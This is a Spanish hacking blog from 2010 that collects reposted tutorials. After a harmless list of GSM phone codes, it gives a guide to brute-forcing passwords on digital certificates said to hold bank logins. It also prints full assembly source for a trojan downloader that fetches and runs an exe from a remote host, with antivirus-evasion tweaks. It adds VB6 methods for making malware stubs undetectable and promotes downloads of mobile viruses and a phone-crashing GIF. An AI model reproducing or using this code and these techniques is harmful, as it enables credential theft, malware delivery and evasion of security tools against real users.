martes, 19 de octubre de 2010

codigos telefonia

codigos telefonia: "esto la saque de una web hace tiempo es viejito pero siempre es bueno saberlo son codigos para telefonos moviles y algunos para fijos espero les sirva, me gustaria que aporten con algunos que sepan muchas gracias.


Todas las llamadas
Inmediato
Activar: **21*NUMERO*(Lista Servicios)# [SEND]
Cancelar: ##21# [SEND]
Estado: *#21# [SEND]

Retardado
Activar: **002*NUMERO*(Lista Servicios)**(de 5 a 30 Segundos)# [SEND]
Cancelar: ##002# [SEND]
Estado: *#002# [SEND]

Condicional
Activar: **004*NUMERO*(Lista Servicios)**(de 5 a 30 Segundos)# [SEND]
Cancelar: ##004# [SEND]
Estado: *#004# [SEND]

No responde
Activar: **61*NUMERO*(Lista Servicios)**(de 5 a 30 Segundos)# [SEND]
Cancelar: ##61# [SEND]
Estado: *#61# [SEND]

No le encuentra
Activar: **62*NUMERO*(Lista Servicios)# [SEND]
Cancelar: ##62# [SEND]
Estado: *#62# [SEND]

Ocupado
Activar: **67*NUMERO*(Lista Servicios)# [SEND]
Cancelar:: ##67# [SEND]
Estado: *#67# [SEND]
Cancelar TODOS los desvios de llamada
##002# [SEND]
NOTA: Las opciones entre parentesis son opcionales. [SEND] es el boton de 'descolgar' suele ser un phone verde.
________________________________________
BLOQUEO DE LLAMADA

Bloquear todas las llamadas SALIENTES

Activar: *33*CODEBLOKEO*(Lista Servicios)# [SEND]

Cancelar:: #33*CODEBLOKEO# [SEND]

Estado: *#33# [SEND]

Bloquear todas las llamadas salientes INTERNACIONALES

Activar: *331*CODEBLOKEO*(Lista Servicios)# [SEND]

Cancelar:: #331*CODEBLOKEO# [SEND]

Estado: *#331# [SEND]

Bloquear todas las llamadas SALIENTES INTERNACIONAES (excepto al pais de origen)

Activar: *332*CODEBLOKEO*(Lista Servicios)#> [SEND]

Cancelar:: #332*CODEBLOKEO# [SEND]

Estado: *#332# [SEND]

Bloquear todas las llamadas ENTRANTES

Activar: *35*CODEBLOKEO*(Lista Servicios)# [SEND]

Cancelar:: #35*CODEBLOKEO# [SEND]

Estado: *#35# [SEND]

Bloquear todas las llamadas ENTRANTES en el EXTRANJERO

Activar: *351*CODEBLOKEO*(Lista Servicios)# [SEND]

Cancelar:: #351*CODEBLOKEO# [SEND]

Estado: *#351# [SEND]

Bloquear TODAS las llamadas

Activar: *330*CODEBLOKEO*(Lista Servicios)# [SEND]

Cancelar:: #330*CODEBLOKEO# [SEND]

Estado: *#330# [SEND]

CANCELAR todos los bloqueos de llamadas

#330*CODEBLOKEO# [SEND]

NOTA: Las opciones entre parentesis son opcionales. [SEND] es el boton de 'descolgar' suele ser un phone verde.CODEBLOKEO es un codigo exclusivo para blokear las llamadas por defecto creo q es 1234 pero se puede cambiar asi:
**03*OLD_CODEBLOKEO*NEW_CODEBLOKEO*NEW_CODEBLOKEO# o
**03**OLD_CODEBLOKEO*NEW_CODEBLOKEO*NEW_CODEBLOKEO#
________________________________________

LLAMADA EN ESPERA

Activar: *43# [SEND]

Cancelar: #43# [SEND]

Estado: *#43# [SEND]

Para finalizar una llamada en espera: 0 [SEND]
Para finalizar la llamada actual y contestar a la q esta en espera: 1 [SEND]
Para poner en espera la llamada actual: 2 [SEND]]
Para añadir la llamada en espera a la llamada actual(llamada a tres, party-line ;-) ): 3 [SEND]
Para hacer una nueva llamada y poner la actual en espera: NUMERO [SEND]
Para finalizar todas la llamadas activas, excepto las q estan en espera: [END]
________________________________________
NUMEROS PIN

Cambiar numeros PIN

PIN: **04*OLD_PIN*NEW_PIN*NEW_PIN#

PIN2: **042*OLD_PIN2*NEW_PIN2*NEW_PIN2#

Desbloquear numeros PIN

PIN: **05*PUK*NEW_PIN*NEW_PIN#

PIN2: **052*PUK2*NEW_PIN2*NEW_PIN2#
________________________________________
CALLER ID (envio/ocultacion del numero al hacer una llamada o recibirla)

Al llamar

Activar: *31# [SEND]

Cancelar: #31# [SEND]

Estado: *#31# [SEND]

Al recibir

Activar: *30# [SEND]

Cancelar: #30# [SEND]

Estado: *#30# [SEND]

Temporal (solo para una llamada)

No mostrar: *31#NUMERO [SEND]

Mostrar: #31#NUMERO [SEND]
COLP :-? (no sabemos q es esto)

Activar: *76# [SEND]

Cancelar: #76# [SEND]

Estado: *#76# [SEND]

COLR :-? (no sabemos q es esto)

Activar: *77# [SEND]

Cancelar: #77# [SEND]

Estado: *#77# [SEND]
"

sábado, 16 de octubre de 2010

Crackeando Certificados Digitales

Crackeando Certificados Digitales: "
¿Que es un certificado digital?

[WIKIPEDIA]

Un Certificado Digital es un documento digital mediante el cual un tercero confiable (una autoridad de certificación) garantiza la vinculación entre la identidad de un sujeto o entidad y su clave pública.

Si bien existen variados formatos para certificados digitales, los más comúnmente empleados se rigen por el estándar UIT-T X.509. El certificado contiene usualmente el nombre de la entidad certificada, número de serie, fecha de expiración, una copia de la clave pública del titular del certificado (utilizada para la verificación de su firma digital) y la firma digital de la autoridad emisora del certificado de forma que el receptor pueda verificar que esta última ha establecido realmente la asociación.

En otras palabras, los certificados digitales suelen tener usuarios y contraseñas importantes, como lo son usuarios y contraseñas bancarias.

pero esto no es tan facil. Estos certificados vienen protegidos con contraseña.

----------------

En este tuto les enseñare a crackearlos para poder acceder a esa informacion.

lo primero que necesitaremos sera un Crackeador llamado Cracker12 que solo corre en Windows

lo pueden descargar de su pagina oficial en sus dos idiomas, Ingles y Español

Descarga: CRACKER12

una vez descargado lo descomprimimos.

NOTA: ESTE CRACKEADOR FUNCIONA SOBRE LA SHELL DE WINDOWS [DoS]

Entonces para hacerlo correr vamos a:

Código:

INICIO>EJECUTAR>CMD

una vez abierta la consola, escribimos lo siguiente:

Código:

D:\brute12>brute12.exe certificado.pfx diccionario.txt


En este caso seleccione la carpeta de donde se encuentra el crackeador en mi PC.

el certificado y el diccionario deben estar en el mismo directorio.

una vez escrito, le damos a Enter, y comenzara a crackear.

nos saldra algo como esto mientras crackea:

Código:

[*]Start
The current date/time is: Mon Mar 31 12:43:12 2008
Words tested: 1000
The current date/time is: Mon Mar 31 12:43:14 2008
Words tested: 2000
The current date/time is: Mon Mar 31 12:43:16 2008
Words tested: 3000
The current date/time is: Mon Mar 31 12:43:17 2008


Esto quiere decir que esta probando con todas las palabras de nuestro diccionario.

este proceso seguira hasta que termine y encuentre a el pass. dira algo como esto:

Código:

PKCS12 Deciphered !!
password:ANTRAX
The current date/time is: Mon Mar 31 12:44:59 2008


Espero que les haya gustado y les sirva
"

Los antivirus y sus "poderosas" heurísticas

Los antivirus y sus "poderosas" heurísticas: "
En este post vamos a ver cuán sencillo es hacer indetectable un troyano. Cogeremos el más simple posible, Troyan.Downloader, un pequeño programa que se baja un exe de una página web y lo ejecuta con CreateProcess.

Éste es el código fuente original, que compila bajo masm32:

Código
.386
.model flat, stdcall ; 32 bit memory model
option casemap :none ; case sensitive

include \MASM32\INCLUDE\windows.inc
include \MASM32\INCLUDE\kernel32.inc
include \MASM32\INCLUDE\urlmon.inc
include \MASM32\INCLUDE\shell32.inc

includelib \MASM32\LIB\kernel32.lib
includelib \MASM32\LIB\urlmon.lib
includelib \MASM32\LIB\shell32.lib

; #########################################
.data
web db 'http://mitroyano.com/test.exe',0
open db 'open',0
dir db 'test.exe',0 (0) ; buffer for command line
pinfo dd 4 dup (0) ;process handles
startupinfo db 48h dup (0) ;startup info for the process were opening

.code

start:
push NULL
push 0
push offset dir
push offset web
push NULL
CALL URLDownloadToFile

push offset pinfo
push offset startupinfo
push NULL
push NULL
push NULL
push TRUE
push NULL
push NULL
push NULL
push offset dir ; Pointer to name of executable mod
call CreateProcessA

push 0
call ExitProcess

end start

; ####################

He marcado en negrita las tres cosas que son importantes en cuánto a comportamiento vírico se refiere:

(1) un string de una web de dónde se descarga el exe: http://...
(2) la llamada a URLDownloadToFile
(3) la llamada a CreateProcess.

Éste es el análisis del virus antes de modificarlo.


Por cierto, ya es bastante grave que antivirus como F-PROT, AVG, bitdefender no cataloguen correctamente nuestro troyano. Pero sigamos.

Ahora haremos un pequeño cambio. Subsituiremos http por wttp y restauraremos el string al principio del programa:

Código
web DB 'wttp://mitroyano.com/troyano.exe', 0
[...]
Lea Eax, [web]
Mov Byte Ptr [Eax], 'h'

Con esto, nos quitamos de encima uno de los antivirus (avira). Aquí tenéis el análisis.

Código:
http://scanner.novirusthanks.org/analysis/e97f5f997c712b39eb038b03db949d7c/UHJveWVjdG8xLmV4ZQ==/

Nuestro siguiente paso va a ser quitar esa llamada tan fea que tenemos a
URLDownloadToFile, que canta muchísimo. ¿Cómo? Pues simplemente vemos con un debugger la primera instrucción que ejecuta la función, que en este caso es mov edi, edi, la copiamos en nuestro programa y luego llamamos a la API con un call eax:

Código
Push NULL
Push 0
push offset dir
push offset web
Push NULL
;Call URLDownloadToFile
Mov Edi, Edi
Mov Eax, URLDownloadToFile
Inc Eax
Inc Eax
Call Eax
Notar que hemos puesto dos inc eax porque la longitud de la instrucción mov edi, edi es dos.

Después de tan complicado cambio, el resultado es que tan sólo Dr.Web lo detecta. ¿Análisis heurístico? ¿Sandboxes? Mejor no digo nada ...


Fuente
"

viernes, 15 de octubre de 2010

Indetectar Malware desde el Codigo Fuente

Indetectar Malware desde el Codigo Fuente: "
Imagen

Dedicacion:

Antes de comenzar con el tutorial dare gracias a dos webs que en verdad me han servido de mucho en principal a 'Indetectables' que con ella me introduje al mundo del malware y verme motivado porque muchos de los usuarios publican sus propias herramientas….. la otra web es 'hackhound' que aunque no este activo en esa web agradesco mucho a los usuario que ahi es donde aprendo mas leyendo cada post que hacen

Conocimientos Minimos:

Pues antes que nada para poder entenderme bien tendras que tener por lo menos conocimientos de como usar vb6 y entender que es una variable y todo eso que deberias aprender antes de meterte a la programacion en vb6 x]!….

Introduccion al tuto:

Como veo que muchos en Indetectables se dedican a codear y en parte para dejarlos FUD los Modean pero estoy seguro que hay personas como yo que no les gusta Modear por el tiempo que uno hace escaneando con cada antivirus y moviendo de maquinas virtuales …. En fin mi objectivo es que no solo existe esa manera de dejarlo FUD sino que tambien por codigo y a mi parecer la mas facil y rapida ya que moviendo unos cuantos codigos o cambiandolos de nombre podemos sakar muchos Avs ya que varios comparten las mismas firmas de esta manera podrias ahorrarte tiempo ; ) .. I hope u got my point hehe..



Entramos a la guerra:

Imagen

Ahora si comenzare con el tutorial explicando cada parte y todos los metodos que se para dejar FUD nuestro Stub o cualquiera aplicacion que deseen ;) …….

Imagen
Encriptando Strings:

Esto es lo mas fundamental de todo el codigo pues ay muchos strings que llevan como texto WINDOWS, System32, textos del registro como HKCU, HKLM y otros …

Hay muchas maneras de encriptarlas les mostrare las que me acuerdo ahora

Ejemplo de string

Imagen

La parte '.exe' jala algunas firmas y por eso tenemos que enciptarla y podemos ponerla de las siguientes maneras

Imagen

[1] En este usamos un String Reverse
[2] En este convertimos a Ascii el texto '.exe' :D
[3] Un ejemplo de como usarlo con alguna encriptacion de las cuales hay muchas o alguna propia que tengan

Con todo esto vemos que tan solo moviendo un poco y usando alternativas para algo que sera igual sacaremos firmas :D...

Imagen

Cambiando Variables:

Muchos de los casos nosotros usamos variables como son las siguientes

Imagen

Pero lo que no sabemos es que ya muchos de estos son tomadas como firmas para los Avs y por ende son detectadas… ahora en el caso de obviar eso podemos poner algunos valores no muy obvios como lo son en el ejemplo anterior sino como este

Imagen

Ahora yo no te pido que hagas exactamente como lo acabo de poner solo puse asi como referencia sobre lo que trato de decir… con solo esto puedes quitar muchos avs ahora si te es molestoso trabajar asi pues simplemente pones tus variables normales y al final cuando ya hayas acabado puedes presionar [Ctrl + F] y reemplazar todos por la nueva variable…

Imagen

Reemplazando Funciones:

Para hacer esto es simplemente buscar alternativas sobre funciones que tengan el mismo proposito un ejemplo muy visto es al momento de hacer un buffer cuando vamos a sacar datos de un archivo esto me sirvio cuando queria tratar de sacar al NOD espero que a ustedes tambien

Imagen

Modificamos el buffer de la siguiente manera serviria igual pero la estructura del codigo cambiaria ahora si deseas puedes usar Lenfile() por LOF() o otra que sepan ;)

Imagen

Imagen

Cambiando nombre de Function y Subs:

Esta es otra manera de sacar unos Avs que nos estan molestando en especial aquellos nombres que tiene algo en referencia al diccionario hack xD

Imagen

Ahora eh visto que RC4 es detectado bueno en mi caso me ah pasado y lo de sAntis tambien para poder sacar algunos Avs en caso de que estas sean detectadas seria cambiarlo de nombre como este

Imagen


Y milagrosamente algunos saldran jejeje….

Imagen
Moviendo el orden de los Subs o functions:

Otra manera es tambien moviendo el orden de las Funciones y Subs ya que hay avs que guardan porcion o estructura de un malware y con tan solo moverlo un poco puede desaparecer la deteccion :D


Ejemplo:



Imagen


Y moviendo el orden un poco quedaria algo asi


Imagen


Y si escaneamos pueda ser que salieron 1 o 2 Avs :)….

Imagen
Agregando codigo basura o Junk Code:

En este caso el significado de Codigo basura o en ingles Junk Code es que añadiremos codigos inservibles a nuestro stub como ejemplo tenemos Loops , Variables, String Values, Ifs , Gotos ……..

Dejare algunos ejemplos de como podrian ser ya cada uno puede hacer el suyo o usar los que dejo

Imagen

Esto puedes ponerlo como Subs o functions pero otro seria agregarlos dentro de uno como este ejemplo

Imagen

Imagen
Agregando Fake Apis a sus modulos:

Esta es con la que podemos sacar AVIRA en los RunPE agregando falsos Apis que haran despistar a los avs :D esto sera interesante para muchos ;)

Ejemplo de declaracion de un RunPE

Imagen

Y ahora poniendo fakes Apis o simplemente Apis de la libreria como los de graficos, de sonido principalmente los que cualquier Av lo vea inofensivo ;)

Ejemplo ya con Apis

Imagen

Imagen
Cambiando nombre de la Carpeta:

Esto si toma gran parte de detecciones poner un proyecto dentro de una carpeta llamada 'Stub' esto lo lleva consigo al momento de compilarlo para confirmar esto abran su stub con bloc de notas y veras la ruta del archivo :D asi que como recomendacion pongan un nombre como Windows, Microsoft que se yo usen la imaginacion x]!

Imagen

Imagen
Cambiar de nombre a los modulos, Forms, Modulos de Clase y otros:

Es preferibles que no pongan nombre relacionados al hacking y seria mejor poner nombres aleatorios como lo muestro en el siguiente ejempo

Imagen

Imagen
Compilando en disco C:

Hay ciertas firmas que son detectadas y aun asi moficiando partes del codigo no ponemos sacarlas en tal caso una solucion seria compilar el proyecto teniendolo en el disco C: de esa manera sacarias a Kaspersky y a otros con el mismo problema :D

Imagen

Imagen
Nombre de Compilado:

Es obvio que poniendo como nombre 'Stub.exe' al compilar sea muy detectado por muchos avs la solucion a esto es poniendo un nombre aleatorio en especial uno no reconocible y ya una vez compilado puedes cambiar el nombre a 'Stub.exe'

Imagen

Imagen
Modificando Info:

Esto si es efectivo cambiar el nombre de toda la informacion por nombres aleatorios ya que con esto sera compilado y el Av tambien lo tendra en cuenta al momento de escanear…. este seria un ejemplo de como ustedes pueden hacerlo


Imagen

Imagen

Y pues obvio cambiar el texto para cada uno de los tipos de informacion como son Comments…. Company Name…..etc (Mi vb6 esta en ingles :D)


Imagen
Cambiando Icono:

Esto principalmente es para quitarnos de encima al Avira no siempre funcionara pero ya en un tutorial aparte les enseñare a quitar al avira profundamente en especial del encriptado ;)…...

Imagen
Pasar Nuestro proyecto a uno nuevo:

Ahora si hemos intentado todo esto y si alguno de los Avs siguen detectando nuestro stub o alguna otra aplicacion lo recomendable es cambiar todo el codigo del proyecto a otro que quiero decir con eso simplemente copiar todos los codigos de los forms, modulos, clases de modulos para pegarlos en otros del nuevo proyecto

Ejemplo:

Imagen

Imagen

Conclusion:

Hasta el momento que estuve escribiendo fueron todos estos los que me acorde aunque siento haberme olvidado de algunos …. Pero bueno solo espero que a muchos les haya servido este tutorial y si les ayudo en algo porfavor no se olviden de dar creditos ya que esto lo hago por compartir con ustedes lo que eh aprendido y seria algo lammer que esten diciendo que ya lo sabian cuando no fue asi… pero de todas maneras se que talvez algunos ya los saben pero hay muchos que no y esto va dirigido hacia ellos ya sin mas nada que decir solo espero que hagan FUD sus tools y colaboren con la comunidad :D… Salu2..

Tips Finales

En el caso de que sea un Stub nuestro proyecto les recomiendo que por nada del mundo vayan a usar stub como variable o como nombre de algun form simplemente evita el uso de esa palabra

Fuente: Indetectables
Autor: Sm0kes
"

Malwares para telefonos Moviles BY ANTRAX

Malwares para telefonos Moviles BY ANTRAX: "
Imagen

Bueno, de manera completa, les expondre una coleccion de Malwares que tengo para telefonos celulares.

..:: GIF DE LA MUERTE ::..


Voy a comenzar mostrandoles este *.GIF Que apaga los celulares Sony Ericsson.


Asi como la ven, es como se ve en el celular, solo que cuando termina de hacer todo el proceso de salir y desaparecer el telefono se apaga.

Segun investigaciones propias, esta imagen fue realizada con el GIF Builder. Programa que se utiliza en MAC para poder agregarle a los *.GIF un Script.

Como todos sabemos, la mayoria de los celulares modernos acepta Java, es por eso que esta imagen fue compilada con un tipo de 'Shutdown' en java.

Otro dato importante, es que este 'Shutdown' Fue sacado del BT Info, o Bluetooth Hacker.

La descarga del GIF lo pueden hacer de aca: DESCARGAR

..:: =================================== ::..

..:: VIRUS PARA CELULARES ::..

Unicos en la red. la coleccion mas grande de virus para celulares de la red.

Contenido:
CommWarrior: Todas las versiones (8 en total)
Cabir: Todas las Versiones (19 en total)
Doombot: 4 versiones
Skudo: 2 versiones
Skull: Todas las versiones (14 en total)
Otros: varios virus desconocidos hasta para mi mas el agregado del Source code de algunos

--Descripción de los virus--

.......::::::cabir:::::::......

Imagen

tipo: virus-gusano
so : Symbian

Cabir es, concretamente, un gusano que utiliza las señales bluetooth, y ya se ha expandido por 20 países. Reduce drásticamente la potencia de los teléfonos infectados, y las variantes más dañinas pueden desactivar el terminal, que debe ser reiniciado en un establecimiento especializado.

Cabir se propaga en forma de un archivo llamado Caribe.sis, que se instala automáticamente en el sistema cuando el usuario acepta la transmisión,El virus vuelve a ejecutarse desde otra ubicación, y el teléfono es reiniciado. Igualmente, el virus se ejecutará cuando el teléfono sea encendido, y seguirá activo a pesar de que sea borrado del directorio APPS.

*DESINFECCION:

Para remover el gusano de un equipo infectado, se deberá instalar un administrador de archivos y habilitar la opción para ver archivos en el directorio de sistema.

Luego, buscar en unidades de la A: a la Y: directorios de nombre \System\Apps\Caribe. Una vez encontrado deben ser eliminados los siguientes archivos:

Caribe.App
Caribe.Rsc
Flo.Mdl

Buscar también el directorio \System\Symbiansecuredata\Caribesecuritymanager y eliminar allí los archivos:

Caribe.App
Caribe.Rsc
Caribe.Sis

Bajo el directorio \System\Recogs eliminar el archivo Flo.Mdl.

Dado que el archivo Caribe.Rsc no puede ser eliminado mientras se esté ejecutando, se deberán eliminar todos los otros archivos, luego reiniciar el equipo y por último eliminar dicho archivo.

Finalmente, eliminar el archivo Caribe.Sis del directorio \System\Installs.


....::::::Commwarrior::::::.....

Imagen

tipo: virus-gusano
so : Symbian

Este gusano poseé las mismas caracteristicas que el cabir pero puede reproducirse por
SMS, MMS, MMS y mandar datos como texto, videos, imagenes etc.
Es el primer gusano con esta capacidad

En algunos modelos de teléfonos, el gusano cambia el logo de la operadora telefónica, por uno propio con el siguiente texto:

Infected by Commwarrior

El gusano tambien puede abrir una página Web con el navegador del celular

modelos afectados:

----Symbian OS Series 60----

Nokia 3650, 3600
Nokia 3660, 3620
Nokia 6600
Nokia 6620
Nokia 7610
Nokia 7650
Nokia N-Gage
Panasonic X700
Sendo X
Siemens SX1

*DESINFECCION:

Eliminación manual

Para eliminar el gusano de un dispositivo infectado, sigue estos pasos:

1. Selecciona la opción 'CommWarrior' de la lista de aplicaciones.

2. Selecciona 'Cancel' (Exit CommWarrior?) y confirma con 'Yes'.

3. Borra la carpeta 'CommWarrior' utilizando el manejador de archivos (file manager):

C:\system\apps\CommWarrior\


Aunque el sistema por defecto se instala en la unidad C, esto puede cambiar en algunos casos.

Si no puedes borrar estos archivos, apaga y vuelva a encender tu dispositivo.

.....::::::Doomboot::::::.....

Imagen
Imagen

tipo: troyano
so : Symbian

Doomboot es un troyano que al ejecutarlo automaticamente se descarga el gusano Commwarrior
Doomboot provoca que los teléfonos no se reinicien como debe. Esta diversidad de efectos virales dañan a los usuarios de smartphones de la serie 60 de Symbian, especialmente a los usuarios que utilizan juegos piratas.

Doomboot provoca que el teléfono no pueda reiniciar y Commwarrior provoca tráfico Bluetooth que hace que el teléfono se quede sin bateria en menos de una hora. Si alguien se infecta de Doomboot tiene menos de una hora para darse cuenta y desinfetcarse, de lo contrario perderá todos sus datos

Doomboot puede distribuirse de dos formas, por mensajes MMS y por menajes Bluetooth


*DESINFECCION:

1. Elimina los siguientes ficheros que localizarás en las ubicaciones indicadas:

* C:\Etel.dll
* C:\etelmm.dll
* C:\etelpckt.dll
* C:\etelsat.dll
* C:\system\apps\Cabir AA detected\Cabir AA detected EVS is disinfecting re-boot your phone.rsc - 0 bytes
* C:\system\apps\Cabir AA detected\Cabir AA detected EVS is disinfecting re-boot your phone.MBM - 0 bytes
* C:\system\apps\Cabir AA detected\Cabir AA detected EVS is disinfecting re-boot your phone.app - 0 bytes
* C:\system\apps\Cabir AA detected\Cabir AA detected EVS is disinfecting re-boot your phone.app - 0 bytes
* C:\system\apps\EVS\EVS.aif - 3,245 bytes
* C:\system\apps\EVS\EVS.app - 30,368 bytes
* C:\system\apps\EVS\EVS.rsc - 671 bytes
* C:\system\apps\EVS\EVS_caption.rsc - 60 bytes
* C:\system\apps\EVS\exovirusstop.mbm - 3,961 bytes
* C:\system\apps\velasco\marcos.mdl - 0 bytes
* C:\system\apps\velasco\velasco.app - 0 bytes
* C:\system\apps\velasco\velasco.rsc - 0 bytes

2. Reinicia tu terminal y explora todo la unidad C: con un antivirus para asegurarte de la eliminación del troyano.


.....::::::skudoo::::::.....

Imagen

tipo: troyano
so : Symbian

Askudoo fecta a dispositivos móviles y opera sobre dispositivos con plataforma Windows CE, J2ME, Symbian, iPhone, Blackberry o Android. Puede ser recibido a través de MMS, vía Bluetooth o descargado a través de páginas web.

es un troyano diseñado para dispositivos móviles, que llegando bajo una apariencia inofensiva, permite en realidad llevar a cabo intrusiones y ataques contra el mismo.

Skudoo no se propaga automáticamente por sus propios medios, pero puede ser recibido a través de mensajes MMS, Bluetooth o ser descargado desde sitios web con contenido malicioso.

.....::::::skulls::::::.....

Imagen

tipo: troyano
so : Symbian

skulls es un troyano que se camuflagea con el nombre Extended Theme Manager,
induce al usuario a creer que al ejecutarlo podrá crear sus propios temas en su teléfono móvil. Sin embargo, Skulls cambia todos los íconos del teléfono con imágenes de calaveras.

Asimismo, las aplicaciones instaladas en el teléfono no pueden ser usadas una vez que Skulls se ha ejecutado.
Skulls se ha propagado mediante sitios de shareware para teléfonos Symbian.


*DESINFECCION:

Para remover el gusano de un equipo infectado, se deberá instalar un administrador de archivos y habilitar la opción para ver archivos en el directorio de sistema.

1. Ir a c:\System\apps\appinst y borrar
c:\System\apps\appinst
c:\System\apps\menu
c:\System\apps\mce
2. Abre el menú de aplicaciones
3. Busca navegador web
4. Descargar F-Secure Mobile Anti-Virus para su dispositivo
http://www.f-secure.com/wireless/download/
o con el propio móvil: http://mobile.f-secure.com
5. Instale F-Secure Mobile Anti-Virus
6. Inicie F-Secure móvil Anti-Virus
7. Analice su dispositivo para eliminar los archivos que se usan para bloquear el sistema de aplicaciones críticas
8. Ir al gestor de aplicaciones
9. Desinstalar 'Extended Theme.sis'


..:: =================================== ::..

..:: ANTIVIRUS PARA CELULARES ::..

Imagen
Imagen
Imagen

En el paquete estan estos antivirus:

* Anti CommaWarrior
* AntiCabir
* Avira Antivirus Mobile
* BitDefender Antivirus
* Bull Guard Antivirus
* Commander Antivirus
* Disinfector
* Exo Virus Stop v 1.0.16
* F-Secure Antivirus
* F-Secure Mobile Anti-Virus 2.0.10431 [Nokia 6600,6670,7610]
* F-Secure Mobile Anti-Virus 2.10.110401 [6630,etc]
* Jiangmin Antivirus
* Kaspersky Antivirus [varios]
* McAfee VirusScan
* NetQin Antivirus [varios]
* Norton Antivirus
* Panda Antivirus
* PhoneGuard 5.15209 con serial
* SimWorks Antivirus
* Smobile VirusGuard
* Symantec Antivirus
* TrendMicro Mobile Security [varios]
* Virus Scan For Sony Ericson
* Zeon Antivirus

"